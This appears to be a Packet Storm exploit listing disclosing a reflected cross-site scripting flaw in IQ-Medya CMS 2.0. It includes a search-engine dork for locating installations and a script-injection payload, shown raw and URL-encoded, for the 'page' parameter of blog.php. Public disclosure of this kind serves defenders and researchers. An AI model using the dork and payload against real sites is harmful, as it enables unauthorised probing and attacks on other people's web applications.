Security
Headlines
HeadlinesLatestCVEs

Headline

IQ-Medya CMS 2.0 Cross Site Scripting

IQ-Medya CMS version 2.0 suffers from a cross site scripting vulnerability.

Packet Storm
#sql#xss#csrf#vulnerability#web#ios#mac#windows#apple#google#ubuntu#linux#debian#cisco#git#java#php#perl#auth#ruby#firefox

IQ-Medya CMS 2.0 Cross Site Scripting

Posted Aug 30, 2023

Authored by indoushka

IQ-Medya CMS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ab1e62fc2de79708c62ff8ba7205592a862ce474915df4ff25b9a691573bdc26

Download | Favorite | View

IQ-Medya CMS 2.0 Cross Site Scripting

====================================================================================================================================| # Title     : İQ-Medya CMS v2.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://iq-medya.net.tr                                                                                            |  | # Dork      : intext:''Tasarım iQ Digital''                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /tr/blog.php?page=<script>alert(/indoushka/);</script>[+]  http://127.0.0.1/uzmangayrimenkulcomtr/tr/blog.php?page=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

File Tags

  • ActiveX (932)
  • Advisory (82,058)
  • Arbitrary (16,220)
  • BBS (2,859)
  • Bypass (1,741)
  • CGI (1,026)
  • Code Execution (7,285)
  • Conference (679)
  • Cracker (841)
  • CSRF (3,348)
  • DoS (23,462)
  • Encryption (2,370)
  • Exploit (52,004)
  • File Inclusion (4,225)
  • File Upload (976)
  • Firewall (821)
  • Info Disclosure (2,788)
  • Intrusion Detection (892)
  • Java (3,046)
  • JavaScript (859)
  • Kernel (6,696)
  • Local (14,466)
  • Magazine (586)
  • Overflow (12,693)
  • Perl (1,423)
  • PHP (5,149)
  • Proof of Concept (2,340)
  • Protocol (3,603)
  • Python (1,535)
  • Remote (30,817)
  • Root (3,587)
  • Rootkit (508)
  • Ruby (612)
  • Scanner (1,640)
  • Security Tool (7,891)
  • Shell (3,188)
  • Shellcode (1,215)
  • Sniffer (895)
  • Spoof (2,207)
  • SQL Injection (16,394)
  • TCP (2,406)
  • Trojan (687)
  • UDP (893)
  • Virus (666)
  • Vulnerability (31,798)
  • Web (9,671)
  • Whitepaper (3,750)
  • x86 (962)
  • XSS (17,974)
  • Other

File Archives

  • August 2023
  • July 2023
  • June 2023
  • May 2023
  • April 2023
  • March 2023
  • February 2023
  • January 2023
  • December 2022
  • November 2022
  • October 2022
  • September 2022
  • Older

Systems

  • AIX (428)
  • Apple (2,002)
  • BSD (373)
  • CentOS (57)
  • Cisco (1,925)
  • Debian (6,822)
  • Fedora (1,692)
  • FreeBSD (1,244)
  • Gentoo (4,322)
  • HPUX (879)
  • iOS (351)
  • iPhone (108)
  • IRIX (220)
  • Juniper (68)
  • Linux (46,555)
  • Mac OS X (686)
  • Mandriva (3,105)
  • NetBSD (256)
  • OpenBSD (485)
  • RedHat (13,781)
  • Slackware (941)
  • Solaris (1,610)
  • SUSE (1,444)
  • Ubuntu (8,852)
  • UNIX (9,302)
  • UnixWare (186)
  • Windows (6,579)
  • Other

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution